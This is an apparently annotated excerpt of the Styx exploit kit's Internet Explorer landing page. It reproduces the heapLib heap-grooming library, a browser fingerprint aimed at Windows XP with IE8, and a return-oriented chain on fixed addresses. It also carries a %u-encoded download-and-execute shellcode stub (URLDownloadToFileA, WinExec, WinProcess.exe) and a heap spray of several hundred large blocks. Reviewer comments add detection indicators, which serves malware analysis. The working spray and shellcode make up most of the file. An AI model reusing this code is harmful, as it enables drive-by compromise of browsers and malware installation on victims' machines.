Kafeine

Styx Sploit Pack - piece of ie78xp.html

Dec 21st, 2012
/**
 * Encodes the string `a` as a run of "%uXXXX" escapes so that it can be
 * appended to the %u-encoded payload literal further down and decoded together
 * with it by unescape().
 *
 * A NUL character is appended, the string is padded with a second NUL if its
 * length is odd, and characters are then consumed in pairs. Each pair is
 * emitted as "%u" + hex(second char) + hex(first char), i.e. the two bytes are
 * swapped into little-endian order inside one 16-bit unit.
 *
 * Triage note: the only caller visible in this excerpt passes `exec_file_url`,
 * so the download URL travels inside the sprayed string in this encoding and
 * will not show up as plain text in a memory or script dump.
 *
 * @param a string to encode (assumed to hold single-byte characters only;
 *          a char code above 0xFF would yield more than two hex digits)
 * @returns the "%u…" encoded text
 */
function Url_To_ShellUrl(a) {
  var c = "",
    b = "",
    d = "",
    a = a + String.fromCharCode(0); // append the NUL terminator
  a.length % 2 && (a += String.fromCharCode(0)); // pad to an even number of characters
  // e advances by two per pass (e++ in the header plus e += 1 in the body);
  // b is the first char of the pair, d the second, both zero-padded to two hex digits.
  for (var e = 0; e < a.length; e++) b = a.charCodeAt(e).toString(16), d = a.charCodeAt(e + 1).toString(16), 2 > b.length && (b = "0" + b), 2 > d.length && (d = "0" + d), c += "%u" + d + b, e += 1;
  return c
}
// Empty function used only as a namespace for the `ie` class below.
// NOTE(review): the identifiers and structure match the publicly documented
// heapLib.ie heap-manipulation library, here in minified form; that makes the
// method names useful static-detection strings.
function heapLib() {}
/**
 * Constructor for the heap helper object.
 *
 * @param a maximum allocation size in bytes; defaults to 65535 when falsy
 * @param c assumed base address of the process heap; defaults to 1376256 (0x150000) when falsy
 */
heapLib.ie = function (a, c) {
  this.maxAlloc = a ? a : 65535;
  this.heapBase = c ? c : 1376256;
  // Grow the "AAAA…" filler by doubling until a string of that length would
  // occupy at least maxAlloc bytes under the 2 * length + 6 size formula.
  for (this.paddingStr = "AAAA"; 2 * this.paddingStr.length + 6 < this.maxAlloc;) this.paddingStr += this.paddingStr;
  this.mem = []; // tag -> list of strings kept alive; dropping a tag releases them
  this.flushOleaut32()
};
// Debug hooks. Each one calls a Math function with the constant 47806 (0xBABE)
// and discards the result with `void`, so none of them changes script state.
// NOTE(review): presumably these exist so that a debugger breakpoint on the
// engine's Math routines can recognise the 0xBABE argument — confirm.
// The constant is a cheap static indicator of this library in a landing page.

// debug(a): a is the message; it is passed as the second atan2 argument.
heapLib.ie.prototype.debug = function (a) {
  void Math.atan2(47806, a)
};
// debugHeap(a): atan when a == true, asin otherwise.
heapLib.ie.prototype.debugHeap = function (a) {
  !0 == a ? void Math.atan(47806) : void Math.asin(47806)
};
// debugBreak(): acos marker.
heapLib.ie.prototype.debugBreak = function () {
  void Math.acos(47806)
};
/**
 * Returns the first `a` characters of the "AAAA…" filler string built by the
 * constructor.
 *
 * @param a number of characters wanted
 * @throws a bare string (not an Error object) when `a` exceeds the filler length
 */
heapLib.ie.prototype.padding = function (a) {
  if (a > this.paddingStr.length) throw "Requested padding string length " + a + ", only " + this.paddingStr.length + " available";
  return this.paddingStr.substr(0, a)
};
/**
 * Rounds `a` up to the next multiple of `c`.
 *
 * @param a value to round
 * @param c granularity; 0 is rejected
 * @throws a bare string when `c` is 0
 */
heapLib.ie.prototype.round = function (a, c) {
  if (0 == c) throw "Round argument cannot be 0";
  // parseInt is used here only to drop the fractional part of the quotient.
  return parseInt((a + (c - 1)) / c) * c
};
/**
 * Formats `a` as upper-case hexadecimal, left-padded with "0" to at least `c`
 * digits.
 *
 * @param a value to format; shifted with >>>, so it is handled as an unsigned 32-bit integer
 * @param c minimum width; treated as 0 when falsy
 * @returns the hex string, without any "0x" prefix
 */
heapLib.ie.prototype.hex = function (a, c) {
  // Emit the lowest nibble first, then prepend one nibble per 4-bit shift.
  for (var b = "0123456789ABCDEF".substr(a & 15, 1); 15 < a;) a >>>= 4, b = "0123456789ABCDEF".substr(a & 15, 1) + b;
  for (c = c ? c : 0; b.length < c;) b = "0" + b;
  return b
};
/**
 * Packs the 32-bit value `a` into a two-character string: the low 16 bits
 * first, then the high 16 bits, each written as a "%uXXXX" escape and decoded
 * with unescape(). In memory that is the little-endian byte order of `a`.
 *
 * @param a 32-bit value (used by vtable() to repeat an address)
 * @returns a string of two UTF-16 code units
 */
heapLib.ie.prototype.addr = function (a) {
  return unescape("%u" + this.hex(a & 65535, 4) + "%u" + this.hex(a >> 16 & 65535, 4))
};
/**
 * Creates one string of a chosen byte size and keeps it alive under tag `c`.
 *
 * The byte size of a string is taken to be 2 * length + 6.
 * NOTE(review): presumably two bytes per character plus a 4-byte length prefix
 * and a 2-byte terminator, as for a BSTR — confirm.
 *
 * @param a either a string to store, or a byte size for which filler is generated
 * @param c tag under which the string is stored in this.mem
 * @throws a bare string when the byte size is not a multiple of 16
 */
heapLib.ie.prototype.allocOleaut32 = function (a, c) {
  var b;
  b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16";
  void 0 === this.mem[c] && (this.mem[c] = []); // first use of this tag
  // A string argument is stored via substr(0, length); a numeric argument is
  // turned into (size - 6) / 2 filler characters.
  // NOTE(review): substr presumably forces a fresh copy rather than a shared reference — confirm.
  "string" == typeof a || a instanceof String ? this.mem[c].push(a.substr(0, a.length)) : this.mem[c].push(this.padding((a - 6) / 2))
};
/**
 * Drops every string stored under tag `a` and asks the engine to collect
 * immediately.
 *
 * CollectGarbage() is a JScript (Internet Explorer) global; other engines do
 * not define it, so this code only runs to completion in IE. Calls to it from
 * page script are uncommon in legitimate sites and are a common heuristic for
 * heap-grooming detection.
 *
 * @param a tag to release
 */
heapLib.ie.prototype.freeOleaut32 = function (a) {
  delete this.mem[a];
  CollectGarbage()
};
/**
 * Releases the strings held under the "oleaut32" tag, then allocates six
 * strings of each of the sizes 32, 64, 256 and 32768 bytes under that tag.
 *
 * NOTE(review): per the debug message, the intent is to flush the OLEAUT32
 * allocation cache so that later allocations and frees reach the system heap;
 * the cache's bucket layout is not visible in this file — confirm against the
 * library's documentation.
 */
heapLib.ie.prototype.flushOleaut32 = function () {
  this.debug("Flushing the OLEAUT32 cache");
  this.freeOleaut32("oleaut32");
  for (var a = 0; 6 > a; a++) this.allocOleaut32(32, "oleaut32"), this.allocOleaut32(64, "oleaut32"), this.allocOleaut32(256, "oleaut32"), this.allocOleaut32(32768, "oleaut32")
};
/**
 * Public allocation entry point: validates the size, then delegates to
 * allocOleaut32().
 *
 * @param a string to store, or a byte size
 * @param c tag to store it under (may be omitted; the spray loop in this file omits it)
 * @throws a bare string when the size is exactly 32, 64, 256 or 32768 bytes,
 *         the four sizes flushOleaut32() itself allocates
 */
heapLib.ie.prototype.alloc = function (a, c) {
  var b;
  b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  if (32 == b || 64 == b || 256 == b || 32768 == b) throw "Allocation sizes " + b + " cannot be flushed out of the OLEAUT32 cache";
  this.allocOleaut32(a, c)
};
/**
 * Releases every string stored under tag `a` (which also triggers
 * CollectGarbage()), then re-runs the OLEAUT32 flush sequence.
 *
 * @param a tag to release
 */
heapLib.ie.prototype.free = function (a) {
  this.freeOleaut32(a);
  this.flushOleaut32()
};
/**
 * Forces a garbage collection via the IE-only CollectGarbage() global and then
 * re-runs the OLEAUT32 flush sequence. Called once by the top-level script
 * immediately before the spray loop.
 */
heapLib.ie.prototype.gc = function () {
  this.debug("Running the garbage collector");
  CollectGarbage();
  this.flushOleaut32()
};
/**
 * Allocates `c` pairs of blocks of size `a` — one untagged, one tagged
 * "freeList" — followed by one more untagged block, then releases the
 * "freeList" tag.
 *
 * NOTE(review): the interleaving presumably keeps the released blocks from
 * being adjacent to each other, so that they stay as separate free entries —
 * confirm. Not called anywhere in this excerpt.
 *
 * @param a string or byte size, as for alloc()
 * @param c number of pairs; defaults to 1 when falsy
 */
heapLib.ie.prototype.freeList = function (a, c) {
  for (var c = c ? c : 1, b = 0; b < c; b++) this.alloc(a), this.alloc(a, "freeList");
  this.alloc(a);
  this.free("freeList")
};
/**
 * Allocates `c` blocks of size `a` under the tag "lookaside" and releases them
 * again straight away.
 *
 * NOTE(review): by its name and size limit this is meant to populate the heap
 * lookaside list for that block size — confirm. Not called in this excerpt.
 *
 * @param a string or byte size; must be a multiple of 16, and size + 8 must stay below 1024
 * @param c number of blocks; defaults to 1 when falsy
 * @throws a bare string when either size constraint is violated
 */
heapLib.ie.prototype.lookaside = function (a, c) {
  var b;
  b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16";
  if (1024 <= b + 8) throw "Maximum lookaside block size is 1008 bytes";
  c = c ? c : 1;
  // b is reused as the loop counter from here on; the size is no longer needed.
  for (b = 0; b < c; b++) this.alloc(a, "lookaside");
  this.free("lookaside")
};
/**
 * Returns heapBase + 1672 + 48 * ((size + 8) / 8) for a block of the given size.
 *
 * NOTE(review): presumably the address of the lookaside list head for that
 * block size; 1672 (0x688) and 48 are hard-coded layout constants and depend
 * on heapBase matching the real heap base of the target process — confirm.
 * Not called in this excerpt.
 *
 * @param a string or byte size; same constraints as lookaside()
 * @throws a bare string when either size constraint is violated
 */
heapLib.ie.prototype.lookasideAddr = function (a) {
  a = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
  if (0 != (a & 15)) throw "Allocation size " + a + " must be a multiple of 16";
  if (1024 <= a + 8) throw "Maximum lookaside block size is 1008 bytes";
  return this.heapBase + 1672 + 48 * ((a + 8) / 8)
};
/**
 * Builds a string laid out as: the two code units 0x9090 0x7CEB, 31 copies of
 * the packed address `c`, the two code units 0x0028 0x0028, the payload `a`,
 * and filler up to the requested size.
 *
 * NOTE(review): by its name this fabricates a fake virtual-function table that
 * is followed by shellcode — confirm. It is not called anywhere in this
 * excerpt, and the last line refers to a free variable `heap` that nothing
 * here defines (the instance created by the top-level script is `heap_obj`).
 *
 * @param a payload string
 * @param c 32-bit address repeated 31 times
 * @param b total size in bytes; defaults to 1008 when falsy, must be a multiple of 16
 * @throws a bare string when the size is misaligned or the payload exceeds size - 138 bytes
 */
heapLib.ie.prototype.vtable = function (a, c, b) {
  b = b ? b : 1008;
  if (0 != (b & 15)) throw "Vtable size " + b + " must be a multiple of 16";
  if (2 * a.length > b - 138) throw "Maximum shellcode length is " + (b - 138) + " bytes";
  for (var d = unescape("%u9090%u7ceb"), e = 0; 31 > e; e++) d += this.addr(c);
  return d += unescape("%u0028%u0028") + a + heap.padding((b - 138) / 2 - a.length)
};
// --- Target fingerprinting and per-target prefix ---------------------------
// pre_shell is prepended to the payload literal before it is decoded;
// off_sub_int is the number of filler characters placed in front of the
// payload inside each 2048-character unit of the spray.
var pre_shell = "";
var off_sub_int = 1530;
// Fingerprint comes from the User-Agent string only.
var userAgent_var = navigator.userAgent.toLowerCase();
// Windows XP ("windows nt 5.1") with Internet Explorer 8 gets a different
// prefix and offset from every other client that reaches this code.
if ((userAgent_var.indexOf("windows nt 5.1") >= 0) && (userAgent_var.indexOf('msie 8') >= 0)) {
  // A list of 32-bit values, low word first. Most have a high word of
  // 0x77c1..0x77c5; the list also contains 0x0c0c0c04 and small constants
  // such as 0x00000040.
  // NOTE(review): this looks like a return-oriented chain built on fixed
  // addresses in one system module, used to get past DEP before the payload
  // runs — confirm by resolving the addresses against the target build.
  // Fixed addresses of this kind are what ASLR is meant to invalidate.
  pre_shell = "%ue393%u77c4%ue392%u77c4%u5ed5%u77c1%u1891%u77c2%u0c04%u0c0c%ue392%u77c4%u1120%u77c1%ue493%u77c2%u7252%u5954%udd6c%u77c2%uec00%u77c4%u5459%u77c3%u7705%u77c4%u0114%u0000%uea01%u77c3%ud000%u77c5%u6100%u77c4%u6101%u77c4%ud680%u77c4%u0040%u0000%ue392%u77c4%u3c37%ud602%u2df9%u77c1";
  off_sub_int = 1524;
}
// `uzuzs` is not defined in this excerpt; it has to come from another part of
// the landing page. `uzuz` is assigned without a declaration, so it becomes a
// global. It is decoded with unescape() below and used as the filler pattern.
uzuz = uzuzs;
// --- Payload assembly and heap spray ---------------------------------------
// The for-initialiser declares three variables:
//   heap_obj - heap helper with a 131072-byte maximum allocation size
//   code     - pre_shell + the fixed payload literal + the %u-encoded download
//              URL (`exec_file_url`, not defined in this excerpt), decoded
//              with unescape()
//   nops     - the decoded filler pattern, doubled by the loop body until it
//              is at least 524288 characters long
//
// Indicators recoverable from the literal without executing it (each %uXXXX is
// one little-endian 16-bit unit): the ASCII strings GetTempPathA,
// LoadLibraryA, GetProcAddress, WinExec, ExitProcess, URLMON.DLL,
// URLDownloadToFileA and WinProcess.exe.
// NOTE(review): that set is consistent with a download-and-execute stub that
// saves the fetched file under the temp directory as WinProcess.exe; the
// machine code itself was not disassembled for this note — confirm.
//
// Static detection hooks: long "%uXXXX" runs passed to unescape(), the literal
// prefix "%uc481%uf254%uffff", and the strings listed above once decoded.
for (var heap_obj = new heapLib.ie(131072), code = unescape(pre_shell + "%uc481%uf254%uffff%u00E8%u0000%u5D00%uED83%u3105%u64C9%u718B%u8B30%u0C76%u768B%u8B1C%u0846%u7E8B%u8B20%u6636%u4F39%u7518%uBEF2%u00D2%u0000%uEE01%uBEBF%u0000%u0100%uE8EF%u0163%u0000%uEA89%uC281%u00D2%u0000%u6852%u0080%u0000%u95FF%u00BE%u0000%uEA89%uC281%u00D2%u0000%uF631%uC201%u9C8A%uE335%u0001%u8000%u00FB%u0674%u1C88%u4632%uEEEB%u04C6%u0032%uEA89%uC281%u01C5%u0000%uFF52%uC295%u0000%u8900%u81EA%uD0C2%u0001%u5200%uFF50%uC695%u0000%u6A00%u6A00%u8900%u81EA%uD2C2%u0000%u5200%uEA89%uC281%u01F2%u0000%u6A52%uFF00%u6AD0%u8905%u81EA%uD2C2%u0000%u5200%u95FF%u00CA%u0000%u006A%u95FF%u00CE%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6D65%u5070%u7461%u4168%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u6547%u5074%u6F72%u4163%u6464%u6572%u7373%u5700%u6E69%u7845%u6365%u4500%u6978%u5074%u6F72%u6563%u7373%uBB00%uF289%uF789%uC030%u75AE%u29FD%u89F7%u31F9%uBEC0%u003C%u0000%uB503%u019B%u0000%uAD66%u8503%u019B%u0000%u708B%u8378%u1CC6%uB503%u019B%u0000%uBD8D%u019F%u0000%u03AD%u9B85%u0001%uAB00%u03AD%u9B85%u0001%u5000%uADAB%u8503%u019B%u0000%u5EAB%uDB31%u56AD%u8503%u019B%u0000%uC689%uD789%uFC51%uA6F3%u7459%u5E04%uEB43%u5EE9%uD193%u03E0%uA785%u0001%u3100%u96F6%uAD66%uE0C1%u0302%u9F85%u0001%u8900%uADC6%u8503%u019B%u0000%uEBC3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u9B85%u0001%u5600%uE857%uFF58%uFFFF%u5E5F%u01AB%u80CE%uBB3E%u0274%uEDEB%u55C3%u4C52%u4F4D%u2E4E%u4C44%u004C%u5255%u444C%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%u5700%u6E69%u7250%u636F%u7365%u2E73%u7865%u0065" + Url_To_ShellUrl(exec_file_url)), nops = unescape(uzuz); 524288 > nops.length;) nops += nops;
// One 2048-character unit = off_sub_int filler characters + payload + filler
// to the end of the unit; the unit is doubled until it reaches at least
// 262144 characters, so the payload recurs at a fixed offset in every unit.
for (var offset = nops.substring(0, off_sub_int), shellcode = offset + code + nops.substring(0, 2048 - code.length - offset.length); 262144 > shellcode.length;) shellcode += shellcode;
// 262141 characters is 2 * 262141 + 6 = 524288 bytes under the library's own
// size formula, i.e. a 512 KiB allocation per copy.
var block = shellcode.substring(0, 262141);
heap_obj.gc();
// 767 copies (i runs from 1 to 767), roughly 383 MiB in total. A browser tab
// whose memory grows by hundreds of megabytes in large identical allocations
// right after page load is the runtime signature of this stage.
for (var i = 1; 768 > i; i++) heap_obj.alloc(block);
// The excerpt ends here: `overflow` is not used in the visible code, and the
// code that triggers the memory-corruption bug is not part of this paste.
var overflow = nops.substring(0, 10);